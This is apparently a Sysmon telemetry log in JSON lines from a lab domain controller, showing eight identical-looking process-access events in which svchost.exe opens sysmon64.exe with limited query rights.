{"EventTime":"2020-08-01 07:57:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4178,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:43.998\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:43.998","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4179,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:43.998\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:43.998","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4180,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:43.998\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:43.998","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4181,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:43.998\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:43.998","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4182,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:43.998\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:43.998","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4183,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:43.998\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:43.998","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4184,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:43.998\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:43.998","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4185,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:43.998\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:43.998","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
